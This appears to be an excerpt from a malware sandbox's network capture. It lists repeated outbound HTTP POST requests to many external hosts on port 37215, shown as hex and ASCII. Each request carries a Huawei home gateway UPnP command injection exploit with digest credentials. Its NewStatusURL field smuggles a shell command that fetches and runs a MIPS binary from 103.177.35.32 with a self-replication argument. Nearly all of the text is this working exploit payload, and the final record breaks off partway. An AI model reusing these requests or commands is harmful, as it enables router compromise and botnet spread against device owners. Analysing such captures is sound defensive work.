                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        843192.168.2.2348972157.20.70.15537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488512993 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        844192.168.2.2360392197.192.146.7037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488554955 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        845192.168.2.2332804157.225.176.20037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488626003 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        846192.168.2.2353802157.82.5.5437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488634109 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        847192.168.2.235577041.88.7.12437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488675117 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        848192.168.2.2337080157.190.127.3937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488684893 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        849192.168.2.235119841.160.4.1037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488687038 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        850192.168.2.2354510197.148.96.437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488718987 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        851192.168.2.2355242157.225.138.8637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488720894 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        852192.168.2.2358490197.88.109.20937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488737106 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
